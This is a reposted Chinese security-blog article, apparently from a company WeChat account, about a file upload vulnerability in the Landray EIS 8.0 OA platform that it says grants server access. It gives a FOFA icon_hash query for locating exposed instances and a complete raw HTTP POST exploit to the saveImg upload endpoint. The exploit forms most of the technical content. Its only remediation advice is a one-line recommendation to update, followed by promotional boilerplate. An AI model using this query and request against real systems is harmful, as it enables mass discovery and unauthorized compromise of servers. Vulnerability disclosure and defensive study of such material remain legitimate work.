大数跨境

某凌文件上传漏洞(附EXP)

某凌文件上传漏洞(附EXP) 河北镌远网络科技有限公司
2023-10-20
1
导读:蓝凌EIS智慧协同平台是由深圳市微达软件有限公司开发的用于企业在知识,协同,项目管理等场景的OA系统。该平台存在文件上传漏洞,通过该漏洞可以获取服务器权限。



某凌文件上传漏洞(附EXP)


0x01 前言

蓝凌EIS智慧协同平台是由深圳市微达软件有限公司开发的用于企业在知识,协同,项目管理等场景的OA系统。该平台存在文件上传漏洞,通过该漏洞可以获取服务器权限

0x02 影响平台

蓝凌EIS 8.0

0x03 漏洞复现

FOfa搜索语法

· 

icon_hash="953405444"

EXP:

POST /eis/service/api.aspx?action=saveImg HTTP/1.1

Host: 127.0.0.1:81

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

Content-Length: 185

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu


------WebKitFormBoundaryxdgaqmqu

Content-Disposition: form-data; name="file"filename="1.txt"

Content-Type: text/html


123123123123

------WebKitFormBoundaryxdgaqmqu—

复现成功

0x04 修复方案

建议及时更新至最新版本!

为网络安全保驾护航
为网络安全勇往直前

如果我们的文章对你有帮助,就把我们“设为星标”吧!

↓↓

3秒加星标,这样就不容易错过文章推送啦!


往期回顾

一次持续的邮件钓鱼攻击的简单溯源分析
联想超70款笔记本电脑被曝新型UEFI固件漏洞



请长按下方图片

识别二维码 关注河北镌远

为客户创造价值

与客户共同成长







【声明】内容源于网络
0
0
河北镌远网络科技有限公司
河北镌远网络科技有限公司是一家集人才、经验、技术于一体的,提供全面系统集成解决方案的专业IT服务商。公司致力于为各个行业的业务信息化提供软件和通用解决方案、系统架构,系统管理和数据安全服务、以及IT咨询规划、系统集成与系统服务等专业化服务。
内容 0
粉丝 0
河北镌远网络科技有限公司 河北镌远网络科技有限公司是一家集人才、经验、技术于一体的,提供全面系统集成解决方案的专业IT服务商。公司致力于为各个行业的业务信息化提供软件和通用解决方案、系统架构,系统管理和数据安全服务、以及IT咨询规划、系统集成与系统服务等专业化服务。
总阅读0
粉丝0
内容0